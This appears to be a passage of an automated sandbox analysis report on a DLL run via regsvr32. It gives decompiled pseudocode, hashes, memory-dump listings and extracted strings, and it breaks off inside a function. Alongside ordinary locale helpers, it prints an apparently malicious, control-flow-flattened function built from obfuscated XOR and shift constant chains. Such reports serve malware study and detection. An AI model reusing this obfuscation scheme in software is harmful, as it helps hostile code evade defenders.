0x003c1db4
0x003c1db9
0x003c1dc3
0x003c1dc7
0x003c1dcb
0x003c1dd3
0x003c1ddb
0x003c1de3
0x003c1deb
0x003c1df3
0x003c1df8
0x003c1e00
0x003c1e08
0x003c1e10
0x003c1e18
0x003c1e2c
0x003c1e31
0x003c1e36
0x003c1eca
0x003c1eca
0x003c1eca
0x00000000
0x003c1ba0
0x003c1b94
0x003c1b88
0x003c1f74
0x003c1f7f
0x003c1f7f
0x003c1eac
0x003c1eb2
0x003c1ebd
0x003c1eba
0x003c1eba
0x003c1ec2
0x003c1ec5
0x00000000
0x003c1ecf
0x003c1ecf
0x00000000
0x003c1edb

Strings

w, xrefs: 003C1B62
o$I, xrefs: 003C1CBB
y\, xrefs: 003C1DE3
2n, xrefs: 003C1F0F
vL[, xrefs: 003C1D24
>=O0, xrefs: 003C1CE2
:l\, xrefs: 003C1D06
vn, xrefs: 003C1E4D

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2n$:l\$>=O0$o$I$vL[$vn$w$y\
API String ID: 0-1838279853
Opcode ID: 6a3f9c81cd2f7245189ea71c5bc8a667df4d224a4ae16e8258639a4ee7877832
Instruction ID: cfc5580cc295d8184e731b9aaf3e14bed57fbd550553275682616b00c2a8fc00
Opcode Fuzzy Hash: 6a3f9c81cd2f7245189ea71c5bc8a667df4d224a4ae16e8258639a4ee7877832
Instruction Fuzzy Hash: 4EB130725083819FD749CF20D98A90BBBE1FBC4758F104A1EF59696260D3B5CA09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 1002904C Relevance: 9.1, APIs: 6, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E1002904C(int _a4, int _a8, char* _a12, int _a16, int _a20) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				void* _v52;
				intOrPtr _t26;
				int _t27;
				int _t28;
				void* _t39;
				short* _t43;
				intOrPtr _t47;
				short* _t48;

				_push(0xffffffff);
				_push(0x10081308);
				_push(E10022B50);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t48 = _t47 - 0x14;
				_v28 = _t48;
				_t26 =  *0x100952e4;
				if(_t26 != 0) {
					L6:
					if(_t26 != 2) {
						if(_t26 != 1) {
							goto L19;
						} else {
							if(_a20 == 0) {
								_a20 =  *0x1009505c;
							}
							_t28 = GetLocaleInfoW(_a4, _a8, 0, 0);
							_v32 = _t28;
							if(_t28 == 0) {
								goto L19;
							} else {
								_v8 = 0;
								E1001B2B0(_t28 + _t28 + 0x00000003 & 0x000000fc, _t39);
								_v28 = _t48;
								_t43 = _t48;
								_v36 = _t43;
								_v8 = _v8 | 0xffffffff;
								if(_t43 == 0 || GetLocaleInfoW(_a4, _a8, _t43, _v32) == 0) {
									goto L19;
								} else {
									_push(0);
									_push(0);
									if(_a16 != 0) {
										_push(_a16);
										_push(_a12);
									} else {
										_push(0);
										_push(0);
									}
									_t27 = WideCharToMultiByte(_a20, 0x220, _t43, 0xffffffff, ??, ??, ??, ??);
								}
							}
						}
					} else {
						_t27 = GetLocaleInfoA(_a4, _a8, _a12, _a16);
					}
				} else {
					if(GetLocaleInfoW(0, 1, 0, 0) == 0) {
						if(GetLocaleInfoA(0, 1, 0, 0) == 0) {
							L19:
							_t27 = 0;
						} else {
							_push(2);
							goto L5;
						}
					} else {
						_push(1);
						L5:
						_pop(_t26);
						 *0x100952e4 = _t26;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t27;
			}

0x1002904f
0x10029051
0x10029056
0x10029061
0x10029062
0x10029069
0x1002906f
0x10029072
0x1002907b
0x100290ab
0x100290ae
0x100290ca
0x00000000
0x100290d0
0x100290d3
0x100290da
0x100290da
0x100290e5
0x100290eb
0x100290f0
0x00000000
0x100290f2
0x100290f2
0x100290fc
0x10029101
0x10029104
0x10029106
0x10029116
0x1002911c
0x00000000
0x10029132
0x10029135
0x10029136
0x10029137
0x1002913d
0x10029140
0x10029139
0x10029139
0x1002913a
0x1002913a
0x1002914e
0x1002914e
0x1002911c
0x100290f0
0x100290b0
0x100290bc
0x100290bc
0x1002907d
0x1002908a
0x1002909d
0x10029156
0x10029156
0x100290a3
0x100290a3
0x00000000
0x100290a3
0x1002908c
0x1002908c
0x100290a5
0x100290a5
0x100290a6
0x00000000
0x100290a6
0x1002908a
0x1002915e
0x10029169

APIs

GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 10029082
GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000001), ref: 10029095
GetLocaleInfoA.KERNEL32(?,?,00000000,00000080,?,?,00000000,00000080,00000000,?,?,00000001), ref: 100290BC
GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000080,00000000,?,?,00000001), ref: 100290E5
GetLocaleInfoW.KERNEL32(?,?,?,?,?,?), ref: 10029128
WideCharToMultiByte.KERNEL32(00000000,00000220,?,000000FF,?,?,00000000,00000000,?,?,?,?), ref: 1002914E

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: InfoLocale$ByteCharMultiWide
String ID:
API String ID: 1691099609-0
Opcode ID: 8f2ad92084bd7240d78516ef5c33bd191ddf2804dffc8077ae095affab385bd9
Instruction ID: fa7d8032bd27cecdd39420e66c03361a81d85d344434220361645ccb6729969d
Opcode Fuzzy Hash: 8f2ad92084bd7240d78516ef5c33bd191ddf2804dffc8077ae095affab385bd9
Instruction Fuzzy Hash: 9331393190122AFFDB228F56DC89A8F7FB5FB45BE0F510116F918952A0D7318560DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 10028F39 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E10028F39(int _a4, int _a8, short* _a12, int _a16, int _a20) {
				int _v8;
				intOrPtr _v20;
				char* _v28;
				int _v32;
				char* _v36;
				void* _v52;
				intOrPtr _t26;
				int _t27;
				int _t28;
				void* _t38;
				char* _t45;
				intOrPtr _t46;
				char* _t47;

				_push(0xffffffff);
				_push(0x100812f8);
				_push(E10022B50);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				_t47 = _t46 - 0x14;
				_v28 = _t47;
				_t26 =  *0x100952e0;
				if(_t26 != 0) {
					L6:
					if(_t26 != 1) {
						if(_t26 != 2) {
							goto L19;
						} else {
							if(_a20 == 0) {
								_a20 =  *0x1009505c;
							}
							_t28 = GetLocaleInfoA(_a4, _a8, 0, 0);
							_v32 = _t28;
							if(_t28 == 0) {
								goto L19;
							} else {
								_v8 = 0;
								E1001B2B0(_t28 + 0x00000003 & 0x000000fc, _t38);
								_v28 = _t47;
								_t45 = _t47;
								_v36 = _t45;
								_v8 = _v8 | 0xffffffff;
								if(_t45 == 0 || GetLocaleInfoA(_a4, _a8, _t45, _v32) == 0) {
									goto L19;
								} else {
									if(_a16 != 0) {
										_push(_a16);
										_push(_a12);
									} else {
										_push(0);
										_push(0);
									}
									_t27 = MultiByteToWideChar(_a20, 1, _t45, 0xffffffff, ??, ??);
								}
							}
						}
					} else {
						_t27 = GetLocaleInfoW(_a4, _a8, _a12, _a16);
					}
				} else {
					if(GetLocaleInfoW(0, 1, 0, 0) == 0) {
						if(GetLocaleInfoA(0, 1, 0, 0) == 0) {
							L19:
							_t27 = 0;
						} else {
							_push(2);
							goto L5;
						}
					} else {
						_push(1);
						L5:
						_pop(_t26);
						 *0x100952e0 = _t26;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t27;
			}

0x10028f3c
0x10028f3e
0x10028f43
0x10028f4e
0x10028f4f
0x10028f56
0x10028f5c
0x10028f5f
0x10028f68
0x10028f98
0x10028f9b
0x10028fb7
0x00000000
0x10028fb9
0x10028fbc
0x10028fc3
0x10028fc3
0x10028fce
0x10028fd4
0x10028fd9
0x00000000
0x10028fdb
0x10028fdb
0x10028fe3
0x10028fe8
0x10028feb
0x10028fed
0x10028ffd
0x10029003
0x00000000
0x10029019
0x1002901c
0x10029022
0x10029025
0x1002901e
0x1002901e
0x1002901f
0x1002901f
0x10029030
0x10029030
0x10029003
0x10028fd9
0x10028f9d
0x10028fa9
0x10028fa9
0x10028f6a
0x10028f77
0x10028f8a
0x10029038
0x10029038
0x10028f90
0x10028f90
0x00000000
0x10028f90
0x10028f79
0x10028f79
0x10028f92
0x10028f92
0x10028f93
0x00000000
0x10028f93
0x10028f77
0x10029040
0x1002904b

APIs

GetLocaleInfoW.KERNEL32(00000000,00000001,00000000,00000000,?,100952D0,00000001,00000004,00000000,?,?,00000001), ref: 10028F6F
GetLocaleInfoA.KERNEL32(00000000,00000001,00000000,00000000,?,100952D0,00000001,00000004,00000000,?,?,00000001), ref: 10028F82
GetLocaleInfoW.KERNEL32(?,?,00000000,00000004,?,100952D0,00000001,00000004,00000000,?,?,00000001), ref: 10028FA9
GetLocaleInfoA.KERNEL32(?,?,00000000,00000000,?,100952D0,00000001,00000004,00000000,?,?,00000001), ref: 10028FCE
GetLocaleInfoA.KERNEL32(?,?,?,100952D0,?,100952D0,00000001,00000004,00000000,?,?), ref: 1002900F
MultiByteToWideChar.KERNEL32(00000001,00000001,?,000000FF,00000000,00000004,?,100952D0,?,100952D0,00000001,00000004,00000000,?,?), ref: 10029030

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: InfoLocale$ByteCharMultiWide
String ID:
API String ID: 1691099609-0
Opcode ID: 9d3f44918a9f4fb7a643401bfbcd3fc99b9d25938e36644669a775656b933a2c
Instruction ID: 85435bdb76bdadc15fa5f956fae848bf3e0e71694808c7bfa347b5b3db0e335b
Opcode Fuzzy Hash: 9d3f44918a9f4fb7a643401bfbcd3fc99b9d25938e36644669a775656b933a2c
Instruction Fuzzy Hash: 05317A3190025AFFDF22CF559C89E9E7FB6FB85BA0F50412AF914A2190D7318A51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 003DC064 Relevance: 9.0, Strings: 7, Instructions: 276
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E003DC064() {
				void* _t236;
				void* _t246;
				signed char _t263;
				signed int* _t279;
				signed int _t283;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed char _t295;
				signed int _t299;
				signed int* _t301;
				signed int _t302;
				signed int* _t305;
				signed int _t306;
				void* _t335;
				signed int _t337;
				signed int _t343;
				void* _t345;

				 *(_t345 + 0x2c) =  *(_t345 + 0x2c) & 0x00000000;
				_t236 = 0xa87be;
				_t343 =  *(_t345 + 0x2c);
				_t337 =  *(_t345 + 0x34);
				 *(_t345 + 0x38) = 0x6e5e3;
				while(1) {
					L1:
					_t306 =  *(_t345 + 0x2c);
					while(1) {
						L2:
						_t285 =  *(_t345 + 0x28);
						do {
							L3:
							while(_t236 != 0x31a4d) {
								if(_t236 == 0x3be4c) {
									 *((char*)(_t345 + 0x12)) =  *_t343;
									 *(_t345 + 0x18) = 0x46989f;
									 *(_t345 + 0x18) =  *(_t345 + 0x18) | 0xfeff9f3f;
									 *(_t345 + 0x18) =  *(_t345 + 0x18) ^ 0xfefa2392;
									 *(_t345 + 0x1c) = 0x4a55e9;
									 *(_t345 + 0x1c) =  *(_t345 + 0x1c) << 1;
									 *((char*)(_t345 + 0x17)) =  *((intOrPtr*)(_t343 + 3));
									_t286 = 0x53;
									 *(_t345 + 0x20) =  *(_t345 + 0x20) / _t286;
									 *(_t345 + 0x20) =  *(_t345 + 0x20) ^ 0x0005e8c6;
									 *(_t345 + 0x18) = 0x6846b;
									 *(_t345 + 0x18) =  *(_t345 + 0x18) << 5;
									_t287 = 0x5d;
									 *(_t345 + 0x14) =  *(_t345 + 0x18) / _t287;
									 *(_t345 + 0x14) =  *(_t345 + 0x14) >> 0xb;
									 *(_t345 + 0x14) =  *(_t345 + 0x14) ^ 0x000cfbca;
									 *(_t345 + 0x20) = 0xdd633;
									 *(_t345 + 0x20) =  *(_t345 + 0x20) + 0xffffcbdf;
									 *(_t345 + 0x20) =  *(_t345 + 0x20) ^ 0x000a52a4;
									_t246 = E003CD933( *(_t345 + 0x20),  *(_t345 + 0x24), 0x3c17b4,  *(_t345 + 0x18),  *(_t345 + 0x20));
									 *(_t345 + 0x28) = 0x6e0287;
									 *(_t345 + 0x28) =  *(_t345 + 0x28) ^ 0xef64ea39;
									 *(_t345 + 0x28) =  *(_t345 + 0x28) + 0xffff5861;
									_t289 = 0x75;
									 *(_t345 + 0x28) =  *(_t345 + 0x28) / _t289;
									 *(_t345 + 0x28) =  *(_t345 + 0x28) ^ 0x0205e8b6;
									 *(_t345 + 0x24) = 0xa2c3a4;
									 *(_t345 + 0x24) =  *(_t345 + 0x24) + 0xcf1;
									 *(_t345 + 0x24) =  *(_t345 + 0x24) << 8;
									 *(_t345 + 0x24) =  *(_t345 + 0x24) ^ 0xa2ded2f4;
									 *(_t345 + 0x30) = 0x3b764e;
									 *(_t345 + 0x30) =  *(_t345 + 0x30) >> 0x10;
									 *(_t345 + 0x30) =  *(_t345 + 0x30) ^ 0x000e73c4;
									 *(_t345 + 0x2c) = 0x11c39a;
									 *(_t345 + 0x2c) =  *(_t345 + 0x2c) | 0xeaeb749f;
									 *(_t345 + 0x2c) =  *(_t345 + 0x2c) ^ 0xdc546bd8;
									 *(_t345 + 0x2c) =  *(_t345 + 0x2c) ^ 0x36a562e4;
									 *(_t345 + 0x20) = 0xec733b;
									 *(_t345 + 0x20) =  *(_t345 + 0x20) | 0xfde7f9ff;
									 *(_t345 + 0x20) =  *(_t345 + 0x20) >> 0x10;
									 *(_t345 + 0x20) =  *(_t345 + 0x20) ^ 0x000fbe66;
									E003C5E26(_t337 + 4,  *(_t345 + 0x42) & 0x000000ff,  *((intOrPtr*)(_t345 + 0x48)),  *(_t343 + 2) & 0x000000ff,  *((intOrPtr*)(_t345 + 0x3c)),  *((intOrPtr*)(_t345 + 0x44)), _t246, 0x10,  *(_t345 + 0x34),  *(_t343 + 2) & 0x000000ff,  *(_t345 + 0x20));
									 *(_t345 + 0x58) = 0xfb4b3d;
									 *(_t345 + 0x58) =  *(_t345 + 0x58) + 0x565;
									 *(_t345 + 0x58) =  *(_t345 + 0x58) ^ 0x00f420d4;
									 *(_t345 + 0x50) = 0xe73282;
									_t291 = 0x65;
									 *(_t345 + 0x54) =  *(_t345 + 0x50) / _t291;
									_t292 = 0x3b;
									 *(_t345 + 0x54) =  *(_t345 + 0x54) / _t292;
									_t293 = 0x7d;
									 *(_t345 + 0x54) =  *(_t345 + 0x54) * 0x37;
									 *(_t345 + 0x54) =  *(_t345 + 0x54) ^ 0x000f261f;
									 *(_t345 + 0x58) = 0xb254a5;
									 *(_t345 + 0x58) =  *(_t345 + 0x58) << 0xf;
									 *(_t345 + 0x58) =  *(_t345 + 0x58) / _t293;
									 *(_t345 + 0x58) =  *(_t345 + 0x58) ^ 0x00502420;
									E003C43D3( *((intOrPtr*)(_t345 + 0x60)),  *(_t345 + 0x58),  *(_t345 + 0x58), _t246);
									_t345 = _t345 + 0x3c;
									 *(_t337 + 0x2c) = ( *(_t343 + 4) & 0x000000ff) << 0x00000008 |  *(_t343 + 5) & 0x000000ff;
									_t263 =  *((intOrPtr*)(_t343 + 6));
									_t295 =  *((intOrPtr*)(_t343 + 7));
									_t343 = _t343 + 8;
									_t236 = 0xa704d;
									 *(_t337 + 0x50) = (_t263 & 0x000000ff) << 0x00000008 | _t295 & 0x000000ff;
									goto L1;
								} else {
									if(_t236 == 0x60746) {
										 *(_t345 + 0x20) = 0xc64d41;
										 *(_t345 + 0x20) =  *(_t345 + 0x20) << 3;
										 *(_t345 + 0x20) =  *(_t345 + 0x20) ^ 0x06397c22;
										 *(_t345 + 0x14) = 0xdcaf79;
										 *(_t345 + 0x14) =  *(_t345 + 0x14) + 0xffff6971;
										 *(_t345 + 0x14) =  *(_t345 + 0x14) + 0x46cb;
										 *(_t345 + 0x14) =  *(_t345 + 0x14) + 0xffffde8a;
										 *(_t345 + 0x14) =  *(_t345 + 0x14) ^ 0x00d641a4;
										_push( *(_t345 + 0x14));
										_push( *(_t345 + 0x24));
										_t283 = E003DF571(0x3e2000, _t345 + 0x30);
										_t306 =  *(_t345 + 0x38) + _t283;
										 *(_t345 + 0x38) = _t283;
										_t343 = _t283;
										 *(_t345 + 0x2c) = _t306;
										_t236 = 0x8959f;
										goto L2;
									} else {
										if(_t236 == 0x67364) {
											 *(_t345 + 0x18) = 0x98dd17;
											 *(_t345 + 0x18) =  *(_t345 + 0x18) + 0xffffed4e;
											 *(_t345 + 0x18) =  *(_t345 + 0x18) << 0xd;
											_t299 = 0x33;
											 *(_t345 + 0x18) =  *(_t345 + 0x18) * 0x1c;
											 *(_t345 + 0x18) =  *(_t345 + 0x18) ^ 0xc46bdb03;
											 *(_t345 + 0x1c) = 0x7587f1;
											 *(_t345 + 0x1c) =  *(_t345 + 0x1c) * 0x31;
											 *(_t345 + 0x1c) =  *(_t345 + 0x1c) ^ 0xcd70d233;
											 *(_t345 + 0x1c) =  *(_t345 + 0x1c) / _t299;
											 *(_t345 + 0x1c) =  *(_t345 + 0x1c) ^ 0x044ccab4;
											 *(_t345 + 0x28) = 0xdbf607;
											 *(_t345 + 0x28) =  *(_t345 + 0x28) + 0xfffff5c7;
											 *(_t345 + 0x28) =  *(_t345 + 0x28) ^ 0x00d314f3;
											 *(_t345 + 0x20) = 0x5f3a41;
											 *(_t345 + 0x20) =  *(_t345 + 0x20) >> 4;
											 *(_t345 + 0x20) =  *(_t345 + 0x20) << 5;
											_t227 = _t345 + 0x20;
											 *_t227 =  *(_t345 + 0x20) ^ 0x00b72110;
											__eflags =  *_t227;
											E003C79D0( *(_t345 + 0x24),  *(_t345 + 0x28),  *_t227,  *(_t345 + 0x30),  *(_t345 + 0x38),  *(_t345 + 0x20));
										} else {
											if(_t236 == 0x8959f) {
												 *(_t345 + 0x20) = 0x6557b1;
												 *(_t345 + 0x20) =  *(_t345 + 0x20) + 0x5a0;
												 *(_t345 + 0x20) =  *(_t345 + 0x20) ^ 0x006ec7d8;
												 *(_t345 + 0x14) = 0x3e895b;
												 *(_t345 + 0x14) =  *(_t345 + 0x14) + 0xe6ba;
												_t302 = 0x32;
												_push(_t302);
												_push(_t302);
												 *(_t345 + 0x1c) =  *(_t345 + 0x14) * 0x14;
												 *(_t345 + 0x1c) =  *(_t345 + 0x1c) ^ 0x95ebba57;
												 *(_t345 + 0x1c) =  *(_t345 + 0x1c) ^ 0x911c6f86;
												 *(_t345 + 0x24) = 0xbebba2;
												 *(_t345 + 0x28) =  *(_t345 + 0x24) * 0x48;
												_t335 = 0x5c;
												 *(_t345 + 0x24) =  *(_t345 + 0x28) / _t302;
												 *(_t345 + 0x24) =  *(_t345 + 0x24) ^ 0x0114a5e8;
												_t337 = E003C8D52(_t302, _t335, __eflags);
												__eflags = _t337;
												if(__eflags != 0) {
													_t236 = 0x3be4c;
													while(1) {
														L1:
														_t306 =  *(_t345 + 0x2c);
														L2:
														_t285 =  *(_t345 + 0x28);
														goto L3;
													}
												}
											} else {
												if(_t236 == 0xa704d) {
													_t279 =  *0x3e2210; // 0x0
													 *_t285 = _t337;
													_t285 = _t337 + 0x58;
													 *(_t345 + 0x28) = _t285;
													_t279[0xc] = _t279[0xc] + 1;
													_t236 = 0x31a4d;
													continue;
												} else {
													if(_t236 != 0xa87be) {
														goto L19;
													} else {
														_t305 =  *0x3e2210; // 0x0
														_t236 = 0x60746;
														_t285 =  &(_t305[8]);
														 *(_t345 + 0x28) = _t285;
														continue;
													}
												}
											}
										}
									}
								}
								L22:
								_t301 =  *0x3e2210; // 0x0
								 *_t301 =  *_t301 & 0x00000000;
								_t301[0xb] = _t301[8];
								__eflags = 1;
								return 1;
							}
							__eflags = _t343 - _t306;
							if(__eflags >= 0) {
								_t236 = 0x67364;
								goto L19;
							} else {
								_t236 = 0x8959f;
								continue;
							}
							goto L22;
							L19:
							__eflags = _t236 - 0x2da1d;
						} while (__eflags != 0);
						goto L22;
					}
				}
			}

0x003dc067
0x003dc06c
0x003dc073
0x003dc079
0x003dc07d
0x003dc085
0x003dc085
0x003dc085
0x003dc089
0x003dc089
0x003dc089
0x003dc08d
0x00000000
0x003dc08d
0x003dc09d
0x003dc20f
0x003dc216
0x003dc21e
0x003dc226
0x003dc22e
0x003dc236
0x003dc23c
0x003dc244
0x003dc249
0x003dc24f
0x003dc257
0x003dc25f
0x003dc268
0x003dc26b
0x003dc26f
0x003dc274
0x003dc27c
0x003dc284
0x003dc28c
0x003dc2a9
0x003dc2ae
0x003dc2b8
0x003dc2c2
0x003dc2d0
0x003dc2db
0x003dc2df
0x003dc2e7
0x003dc2ef
0x003dc2f7
0x003dc304
0x003dc30c
0x003dc314
0x003dc319
0x003dc321
0x003dc329
0x003dc331
0x003dc339
0x003dc341
0x003dc349
0x003dc351
0x003dc356
0x003dc383
0x003dc388
0x003dc392
0x003dc39a
0x003dc3a2
0x003dc3b0
0x003dc3b5
0x003dc3bf
0x003dc3c4
0x003dc3cf
0x003dc3d1
0x003dc3d5
0x003dc3dd
0x003dc3e5
0x003dc3f0
0x003dc3f4
0x003dc408
0x003dc411
0x003dc41f
0x003dc423
0x003dc426
0x003dc429
0x003dc439
0x003dc43e
0x00000000
0x003dc0a3
0x003dc0a8
0x003dc193
0x003dc19f
0x003dc1a9
0x003dc1b1
0x003dc1b9
0x003dc1c1
0x003dc1c9
0x003dc1d1
0x003dc1d9
0x003dc1dd
0x003dc1ea
0x003dc1ed
0x003dc1ef
0x003dc1f4
0x003dc1f6
0x003dc1fa
0x00000000
0x003dc0ae
0x003dc0b3
0x003dc46a
0x003dc474
0x003dc47c
0x003dc488
0x003dc489
0x003dc48d
0x003dc495
0x003dc4a2
0x003dc4a6
0x003dc4b4
0x003dc4b8
0x003dc4c0
0x003dc4c8
0x003dc4d0
0x003dc4d8
0x003dc4e0
0x003dc4e5
0x003dc4ea
0x003dc4ea
0x003dc4ea
0x003dc506
0x003dc0b9
0x003dc0be
0x003dc0fe
0x003dc108
0x003dc110
0x003dc118
0x003dc120
0x003dc12f
0x003dc130
0x003dc131
0x003dc132
0x003dc136
0x003dc13e
0x003dc146
0x003dc155
0x003dc15f
0x003dc160
0x003dc164
0x003dc17d
0x003dc181
0x003dc183
0x003dc189
0x003dc085
0x003dc085
0x003dc085
0x003dc089
0x003dc089
0x00000000
0x003dc089
0x003dc085
0x003dc0c0
0x003dc0c5
0x003dc0e6
0x003dc0eb
0x003dc0ed
0x003dc0f0
0x003dc0f4
0x003dc0f7
0x00000000
0x003dc0c7
0x003dc0cc
0x00000000
0x003dc0d2
0x003dc0d2
0x003dc0d8
0x003dc0dd
0x003dc0e0
0x00000000
0x003dc0e0
0x003dc0cc
0x003dc0c5
0x003dc0be
0x003dc0b3
0x003dc0a8
0x003dc50e
0x003dc50e
0x003dc51a
0x003dc51d
0x003dc522
0x003dc527
0x003dc527
0x003dc447
0x003dc449
0x003dc455
0x00000000
0x003dc44b
0x003dc44b
0x00000000
0x003dc44b
0x00000000
0x003dc45a
0x003dc45a
0x003dc45a
0x00000000
0x003dc465
0x003dc089

Strings

$P, xrefs: 003DC3F4
9d, xrefs: 003DC2B8
Nv;, xrefs: 003DC30C
Mp, xrefs: 003DC439
A:_, xrefs: 003DC4D8
Mp, xrefs: 003DC0C0
UJ, xrefs: 003DC22E

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$9d$A:_$Mp$Mp$Nv;$UJ
API String ID: 0-2262822461
Opcode ID: e34b025c3afb7156de46866681129d3fccf7a749b3f8b28350f5c6017cb1a8a7
Instruction ID: b9b7270f819503d929c8edc50bee398b61d5edad859d5210b04395fbd5917624
Opcode Fuzzy Hash: e34b025c3afb7156de46866681129d3fccf7a749b3f8b28350f5c6017cb1a8a7
Instruction Fuzzy Hash: 25C132715083819FC309CF25D44955BBBE2FBD8758F148A1EF4C9AA260D7B8CA49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 003CEC5D Relevance: 8.0, Strings: 6, Instructions: 530
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E003CEC5D(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t519;
				void* _t521;
				signed int _t527;
				signed int _t537;
				void* _t546;
				void* _t552;
